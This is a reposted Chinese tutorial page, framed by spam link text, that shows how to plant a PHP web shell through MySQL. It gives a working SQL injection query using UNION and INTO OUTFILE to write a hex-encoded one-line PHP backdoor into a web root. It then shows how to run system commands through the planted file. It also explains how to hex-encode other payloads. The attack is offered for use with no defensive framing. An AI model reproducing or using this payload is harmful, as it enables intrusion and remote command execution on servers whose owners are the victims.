国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > MySQL > 正文

通過Mysql的語句生成后門木馬的方法

2024-07-24 12:55:18
字體:
來源:轉載
供稿:網友

通過mysql 的語句生成后門木馬的方法!

select * from `vbb_strikes` where 1 union select 2,3,0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通過mysql 的注入或者在 phpmyadmin 里運行以上語句,則會c:/inetpub/wwwroot/下生成 cmd.php 文件,內容為原來的 vbb_strikes 內容,后面緊跟著:

2 3 <?php system($_request[cmd]);?>

再通過 http://www.xxx.com/cmd.php?cmd=dir c:/ 就可以執行系統dos命令!

哪串0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e是什么東西?

就是<?php system($_request[cmd]);?>的十六進制編碼了,如果不用這種方法,有不同的sql版本會出現其它的編碼:如%xx之類的,哪這個后門就不能執行的了!如果你有其它語名要弄,可以到ultraedit里輸入,再按[ctrl+h]鍵,將里面的十六進制連在一起就可以了!

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 集安市| 廉江市| 吴堡县| 石河子市| 银川市| 神农架林区| 汉寿县| 巫山县| 山阴县| 沁阳市| 乌兰县| 上栗县| 萨嘎县| 乳山市| 正镶白旗| 自治县| 英超| 怀集县| 凤城市| 穆棱市| 疏勒县| 紫金县| 松潘县| 循化| 威信县| 儋州市| 康定县| 沧州市| 兴宁市| 高密市| 忻城县| 陇南市| 乌什县| 华坪县| 新建县| 临猗县| 称多县| 宣化县| 苏州市| 淮阳县| 菏泽市|